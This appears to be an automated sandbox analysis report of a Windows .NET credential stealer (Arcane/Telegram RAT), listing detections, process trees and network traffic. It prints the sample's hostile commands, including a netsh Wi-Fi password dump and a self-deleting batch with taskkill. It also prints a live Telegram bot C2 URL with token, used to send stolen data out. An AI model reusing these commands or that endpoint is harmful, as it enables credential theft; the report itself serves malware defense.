Windows Analysis Report
zyEDYRU0jw.exe

Overview

General Information

Sample name: zyEDYRU0jw.exe (renamed because original name is a hash value)
Original sample name: c43a34e78ba6913551af41857fb63a3545acd6a9248e8a4de884988b3ccf895d.exe
Analysis ID: 1576963
MD5: 41d3660b5321768122f4c25ac9868fc3
SHA1: d42e3c5fc24e309581819cba723b14c3c247d824
SHA256: c43a34e78ba6913551af41857fb63a3545acd6a9248e8a4de884988b3ccf895d
Tags: exe, user-JAMESWT_MHT

Detection

Arcane
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Arcane Stealer
Yara detected Telegram RAT
.NET source code references suspicious native API functions
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries pointing device information (via WMI, Win32_PointingDevice, often done to detect virtual machines)
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Queries sensitive printer information (via WMI, Win32_Printer, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

  • System is w10x64
  • zyEDYRU0jw.exe (PID: 1352 cmdline: "C:\Users\user\Desktop\zyEDYRU0jw.exe" MD5: 41D3660B5321768122F4C25AC9868FC3)
    • cmd.exe (PID: 2172 cmdline: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 6104 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • netsh.exe (PID: 768 cmdline: netsh wlan show profiles MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • findstr.exe (PID: 3356 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
    • cmd.exe (PID: 7232 cmdline: "cmd.exe" /c tasklist MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7280 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 7540 cmdline: "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7596 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
      • taskkill.exe (PID: 7640 cmdline: TaskKill /F /IM 1352 MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 7692 cmdline: Timeout /T 2 /Nobreak MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • WerFault.exe (PID: 7700 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 3228 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: ROLLCOAST, Arcane
Description: ROLLCOAST is a ransomware program that encrypts files on logical drives attached to a system. ROLLCOAST is a Dynamic Linked Library (DLL) with no named exports. When observed by Mandiant it uniquely had only one ordinal export 0x01. This suggested the sample was designed to avoid detection and be invoked within memory, possibly through BEACON provided to affiliates. Incident responders working on similar intrusions should capture memory for analysis.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.rollcoast
{"C2 url": "https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendMessage"}
Source | Rule | Description | Author
zyEDYRU0jw.exe | JoeSecurity_Arcane | Yara detected Arcane Stealer | Joe Security
zyEDYRU0jw.exe | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
zyEDYRU0jw.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

Source | Rule | Description | Author
00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Arcane | Yara detected Arcane Stealer | Joe Security
00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: zyEDYRU0jw.exe PID: 1352 | JoeSecurity_Arcane | Yara detected Arcane Stealer | Joe Security
Source | Rule | Description | Author
0.0.zyEDYRU0jw.exe.650000.0.unpack | JoeSecurity_Arcane | Yara detected Arcane Stealer | Joe Security
0.0.zyEDYRU0jw.exe.650000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.0.zyEDYRU0jw.exe.650000.0.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

Stealing of Sensitive Information

Source: Process started | Author: Joe Security | Data: Command: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\zyEDYRU0jw.exe", ParentImage: C:\Users\user\Desktop\zyEDYRU0jw.exe, ParentProcessId: 1352, ParentProcessName: zyEDYRU0jw.exe, ProcessCommandLine: "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All, ProcessId: 2172, ProcessName: cmd.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T19:47:12.021049+0100 | 2039009 | 1 | A Network Trojan was detected | 149.154.167.220 | 443 | 192.168.2.5 | 49708 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-17T19:47:11.098387+0100 | 2843856 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 149.154.167.220 | 443 | TCP

AV Detection

Source: zyEDYRU0jw.exe | Avira: detected
Source: zyEDYRU0jw.exe.1352.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendMessage"}
Source: zyEDYRU0jw.exe | ReversingLabs: Detection: 63%
Source: Yara match | File source: zyEDYRU0jw.exe, type: SAMPLE
Source: Yara match | File source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: zyEDYRU0jw.exe | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: zyEDYRU0jw.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Windows.Forms.pdbMZ@ source: WERD44F.tmp.dmp.19.dr
Source: Binary string: Stealer.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Core.pdbSystem.ni.dll source: WERD44F.tmp.dmp.19.dr
Source: Binary string: C:\Users\Malware\Desktop\Arcane\Str\Stealer\Stealer\obj\Release\Stealer.pdb source: zyEDYRU0jw.exe
Source: Binary string: System.Configuration.ni.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Net.Http.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Security.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.IO.Compression.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Configuration.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Xml.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Core.ni.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Windows.Forms.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: mscorlib.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: LOGLOA~1.PDBwinload_prod.pdb source: zyEDYRU0jw.exe, 00000000.00000002.2256448828.0000000005B1A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERD44F.tmp.dmp.19.dr
Source: Binary string: acation Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA93)W source: zyEDYRU0jw.exe, 00000000.00000002.2256448828.0000000005B31000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Net.Http.ni.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Management.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Drawing.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Drawing.pdb < source: WERD44F.tmp.dmp.19.dr
Source: Binary string: mscorlib.ni.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Management.ni.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Core.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Management.pdbMZ@ source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.IO.Compression.pdbH source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Net.Http.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.ni.pdb source: WERD44F.tmp.dmp.19.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERD44F.tmp.dmp.19.dr

Networking

Source: Network traffic | Suricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.2.5:49708 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2039009 - Severity 1 - ET MALWARE Win32/SaintStealer CnC Response : 149.154.167.220:443 -> 192.168.2.5:49708
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected:
    POST /bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary="6b29678b-5dd7-4ef1-9acd-f26ecdf2bb88"
    Host: api.telegram.org
    Content-Length: 89443
    Expect: 100-continue
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: icanhazip.com
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.16.184.241
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: icanhazip.com
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: icanhazip.com
    Connection: Keep-Alive
Source: zyEDYRU0jw.exe | String found in binary or memory: https://mail.ru%https://rambler.ru-https://www.paypal.com#https://yandex.ru equals www.rambler.ru (Rambler)
Source: zyEDYRU0jw.exe | String found in binary or memory: https://mega.nz%https://roblox.com%https://cpanel.net'https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.epicgames.com;https://genshin.hoyoverse.com5https://us.shop.battle.net/https://www.booking.com/https://keep.google.com)https://www.ebay.com5https://steamcommunity.com3https://www.microsoft.com#https://yahoo.com'https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github.com-https://www.icloud.com-https://www.reddit.com equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: icanhazip.com
Source: global traffic | DNS traffic detected: DNS query: 238.14.8.0.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected:
    POST /bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary="6b29678b-5dd7-4ef1-9acd-f26ecdf2bb88"
    Host: api.telegram.org
    Content-Length: 89443
    Expect: 100-continue
    Connection: Keep-Alive
Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.orgd
Source: zyEDYRU0jw.exe | String found in binary or memory: http://icanhazip.com
Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com/
Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.19.dr | String found in binary or memory: http://upx.sf.net
Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: zyEDYRU0jw.exe | String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: zyEDYRU0jw.exe | String found in binary or memory: https://api.telegram.org/bot
Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocument
Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002AB2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7501458999:AAE_ZNbE_D3XZ8TXpCn-L8D8f4rkvZodj0c/sendDocumentT
Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: zyEDYRU0jw.exe | String found in binary or memory: https://discord.com%https://tiktok.com3https://www.instagram.com%https://twitch.com7https://store.ep
Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: zyEDYRU0jw.exe | String found in binary or memory: https://gmail.com
Source: zyEDYRU0jw.exe | String found in binary or memory: https://ipinfo.io/#
Source: zyEDYRU0jw.exe | String found in binary or memory: https://mega.nz%https://roblox.com%https://cpanel.net
Source: zyEDYRU0jw.exe | String found in binary or memory: https://ozon.ru
Source: zyEDYRU0jw.exe | String found in binary or memory: https://www.aol.com1https://www.coinbase.com)https://freebitco.in%https://funpay.com%https://github.
Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmpB0CD.tmp.dat.0.dr, tmpB0DF.tmp.dat.0.dr, tmpB0DE.tmp.dat.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: zyEDYRU0jw.exe | String found in binary or memory: https://x.com-https://ads.google.com-https://pay.google.com
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: zyEDYRU0jw.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.zyEDYRU0jw.exe.650000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: zyEDYRU0jw.exe PID: 1352, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D3FC180_2_00D3FC18
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D355A70_2_00D355A7
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_00D355A80_2_00D355A8
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D06A680_2_06D06A68
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D0E3380_2_06D0E338
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D01EF00_2_06D01EF0
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D01EE00_2_06D01EE0
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D0DE770_2_06D0DE77
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D0FC280_2_06D0FC28
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D0FD700_2_06D0FD70
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D0DB250_2_06D0DB25
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06E704300_2_06E70430
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 3228
                        Source: zyEDYRU0jw.exe, 00000000.00000000.2064228999.0000000000652000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStealer.exeJ vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002A31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002C46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefirefox.exe0 vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002C46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\000004B0\\OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2249779842.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002D92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002D92000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002CEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamechrome.exe< vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002CEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]q,\\StringFileInfo\\040904B0\\OriginalFilename vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2259776720.0000000006990000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exeBinary or memory string: OriginalFilenameStealer.exeJ vs zyEDYRU0jw.exe
                        Source: zyEDYRU0jw.exe, ChromeDevToolsWrapper.csSuspicious URL: 'https://avito.ru', 'https://rambler.ru', 'https://yandex.ru'
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/20@3/2
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeCode function: 0_2_06D03CAC CreateToolhelp32Snapshot,0_2_06D03CAC
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7240:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7548:120:WilError_03
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1352
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile created: C:\Users\user\AppData\Local\Temp\bwvswysc.wf3Jump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat
                        Source: zyEDYRU0jw.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: zyEDYRU0jw.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 1352)
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp, zyEDYRU0jw.exe, 00000000.00000002.2250498152.0000000002C05000.00000004.00000800.00020000.00000000.sdmp, tmpB10E.tmp.dat.0.dr, tmpB0CB.tmp.dat.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: zyEDYRU0jw.exeReversingLabs: Detection: 63%
                        Source: unknownProcess created: C:\Users\user\Desktop\zyEDYRU0jw.exe "C:\Users\user\Desktop\zyEDYRU0jw.exe"
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp48A1.tmp.bat
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 1352
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 3228
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: apphelp.dll
                        Source: C:\Users\user\Desktop\zyEDYRU0jw.exe | Section loaded: kernel.appcore.dll
